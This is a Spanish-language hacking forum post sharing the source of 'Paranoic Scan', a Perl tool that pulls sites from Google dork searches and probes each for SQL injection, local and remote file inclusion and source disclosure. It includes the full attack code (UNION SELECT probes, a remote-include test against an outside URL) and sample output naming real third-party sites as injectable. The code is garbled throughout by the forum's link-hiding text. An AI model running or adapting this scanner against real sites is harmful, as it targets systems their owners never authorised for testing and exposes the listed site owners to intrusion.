comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] Paranoic Scan By Doddy H

  • 0 Respuestas
  • 994 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:48:39 pm »
Hola.

Hoy traigo un programa que eh estado haciendo porque estaba arto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones

* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear


Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE



Ejemplo de uso


Código: Perl
  1.  
  2.  
  3.  
  4. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
  5.  @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
  6.  @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
  7.  @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
  8.  @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
  9.  @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
  10. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @
  11.  
  12.  
  13.  
  14.  
  15. [a] : Scan a File
  16. [b] : Search in google and scan the webs
  17.  
  18. [option] : b
  19.  
  20. [+] Dork : ficha.php+id
  21. [+] Pages : 200
  22.  
  23.  
  24. [+] Scan Type :
  25.  
  26. [S] : SQL
  27. [L] : LFI
  28. [R] : RFI
  29. [F] : Full Source Discloure
  30. [A] : All
  31.  
  32.  
  33. [Option] : No tienes permisos para ver links. Registrate o Entra con tu cuenta
  34.  
  35. [Google] : www.google.com.ar
  36. [Dork] : ficha.php+id
  37. [Pages] : 200
  38.  
  39. [+] Searching pages..
  40. [+] Cleaning results
  41.  
  42. [Status] : Scanning
  43. [Webs Count] : 136
  44.  
  45. [+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
  46. [+] SQLI : http://www.vincipark.es/ficha.php?id=
  47. [+] SQLI : http://www.maxhuber.cl/ficha.php?id=
  48. [+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
  49. [+] SQLI : http://www.bvocal.org/ficha.php?id=
  50. [+] SQLI : http://www.animadas.com/artista-ficha.php?id=
  51. [+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
  52. [+] SQLI : http://codigo-civil.org/base/ficha.php?id=
  53. [+] SQLI : http://www.cibercolchon.com/ficha.php?id=
  54. [+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
  55. [+] SQLI : http://www.nibbledpencil.com/ficha.php?id=
  56.  
  57. [Status] : Finish
  58.  
  59.  
  60.  
  61. (C) Doddy Hackman 2010
  62.  


Codigo

Código: Perl
  1. #!usr/bin/perl
  2. #Paranoic Scan 0.4
  3. #(c)0ded by Doddy H 2010
  4.  
  5. use LWP::UserAgent;
  6. use HTTP::Request::Common;
  7. use URI::Split No tienes permisos para ver links. Registrate o Entra con tu cuenta(uri_split);
  8.  
  9. my $nave = LWP::UserAgent->new();
  10. $nave->timeout(5);
  11. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  12.  
  13.  
  14.  
  15.  
  16.  
  17. sub head {
  18. No tienes permisos para ver links. Registrate o Entra con tu cuenta 'cls';
  19. No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  20.  
  21.  
  22. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
  23.  @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
  24.  @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
  25.  @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
  26.  @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
  27.  @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
  28. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @
  29.  
  30.  
  31.  
  32.  
  33. );
  34. }
  35. &menu;
  36. sub menu {
  37. &head;
  38. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[a] : Scan a File\n";
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[b] : Search in google and scan the webs\n\n";
  40. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[option] : ";
  41. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $op = <STDIN>);
  42. if ($op=~/a/ig) {
  43. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Wordlist : ";
  44. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $word = <STDIN>);
  45. @paginas = repes(savewords($word));
  46. my $option = &men;
  47. scan($option,@paginas);
  48. }
  49. elsif ($op=~/b/ig) {
  50. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Dork : ";
  51. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $dork = <STDIN>);
  52. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Pages : ";
  53. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $pag = <STDIN>);
  54. my $option = &men;
  55. @paginas = &google("www.google.com.ar",$dork,$pag);
  56. scan($option,@paginas);
  57. }
  58. else {
  59. &menu;
  60. }
  61. }
  62. sub scan {
  63. my ($option,@webs) = @_;
  64. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Status] : Scanning\n";
  65. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Webs Count] : ".No tienes permisos para ver links. Registrate o Entra con tu cuenta(@webs)."\n\n";
  66. for(@webs) {
  67. if ($option=~/S/ig) {
  68. &sql($_);
  69. }
  70. if ($option=~/L/ig) {
  71. &lfi($_);
  72. }
  73. if ($option=~/R/ig) {
  74. &rfi($_);
  75. }
  76. if ($option=~/F/ig) {
  77. &fsd($_);
  78. }
  79. if ($option=~/A/ig) {
  80. &sql($_);
  81. &lfi($_);
  82. &rfi($_);
  83. &fsd($_)
  84. }
  85. }
  86. }
  87. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Status] : Finish\n";
  88. &finish;
  89.          
  90.  
  91. sub toma {
  92. No tienes permisos para ver links. Registrate o Entra con tu cuenta $nave->request (GET $_[0])->content;
  93. }
  94.  
  95.  
  96. sub savefile {
  97. No tienes permisos para ver links. Registrate o Entra con tu cuenta (SAVE,">>logs/".$_[0]);
  98. No tienes permisos para ver links. Registrate o Entra con tu cuenta SAVE $_[1]."\n";
  99. No tienes permisos para ver links. Registrate o Entra con tu cuenta SAVE;
  100. }
  101.  
  102. sub finish {
  103. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n\n(C) Doddy Hackman 2010\n\n";
  104. <STDIN>;
  105. No tienes permisos para ver links. Registrate o Entra con tu cuenta(1);
  106. }
  107.  
  108.  
  109. sub google {
  110. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
  111. for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
  112. $response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
  113. while ($response=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
  114. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@founds,$1);
  115. }}
  116. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Cleaning results\n";
  117. for(@founds) {
  118. $t = clean($_);
  119. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@r,$t);
  120. }      
  121. No tienes permisos para ver links. Registrate o Entra con tu cuenta(repes(@r));
  122. }
  123.  
  124.  
  125. sub sql {
  126. my ($pass1,$pass2) = ("+","--");
  127. my $page = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  128. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  129. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  130. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] SQLI : $page\a\n";
  131. savefile("sql-logs.txt",$page);
  132. }}
  133.  
  134. sub rfi {
  135. my $page = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  136. $code1 = toma($page."http:/www.supertangas.com/");
  137. if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
  138. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] RFI : $page\a\n";
  139. savefile("rfi-logs.txt",$page);
  140. }}
  141.  
  142. sub lfi {
  143. my $page = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  144. $code1 = toma($page."'");
  145. if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  146. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] LFI : $page\a\n";
  147. savefile("lfi-logs.txt",$page);
  148. }}
  149.  
  150.  
  151. sub fsd {
  152. my $page = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  153. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  154. if ($path=~/\/(.*)$/) {
  155. my $me = $1;
  156. $code1 = toma($page.$me);
  157. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  158. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Full Source Discloure : $page\a\n";
  159. savefile("fpd-logs.txt",$page);
  160. }}}
  161.  
  162. sub repes {
  163. foreach my $palabra ( @_ ) {
  164. next if $repety{ $palabra }++;
  165. No tienes permisos para ver links. Registrate o Entra con tu cuenta @revisado,$palabra;
  166. }
  167. No tienes permisos para ver links. Registrate o Entra con tu cuenta @revisado;
  168. }
  169.  
  170. sub savewords {
  171. No tienes permisos para ver links. Registrate o Entra con tu cuenta (FILE,$_[0]);
  172. @words = <FILE>;
  173. No tienes permisos para ver links. Registrate o Entra con tu cuenta FILE;
  174. for(@words) {
  175. $t = clean($_);
  176. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@r,$t);
  177. }      
  178. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@r);
  179. }
  180.  
  181. sub men {
  182. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Scan Type : \n\n";
  183. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[S] : SQL\n";
  184. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[L] : LFI\n";
  185. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[R] : RFI\n";
  186. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[F] : Full Source Discloure\n";
  187. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[A] : All\n\n";
  188. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Option] : ";
  189. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $option = <STDIN>);
  190. No tienes permisos para ver links. Registrate o Entra con tu cuenta $option;
  191. }
  192.  
  193. sub clean {
  194. if ($_[0] =~/\=/) {
  195. my @sacar= No tienes permisos para ver links. Registrate o Entra con tu cuenta("=",$_[0]);
  196. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@sacar[0]."=");
  197. }
  198. }
  199.  
  200. #The End
  201. #Contact : doddy-hackman[at]hotmail[com]
  202. #blog : doddy-hackman.blogspot.com
  203.  
« Última modificación: Marzo 14, 2015, 10:04:57 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3161
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1476
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1103
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1602
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1134
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear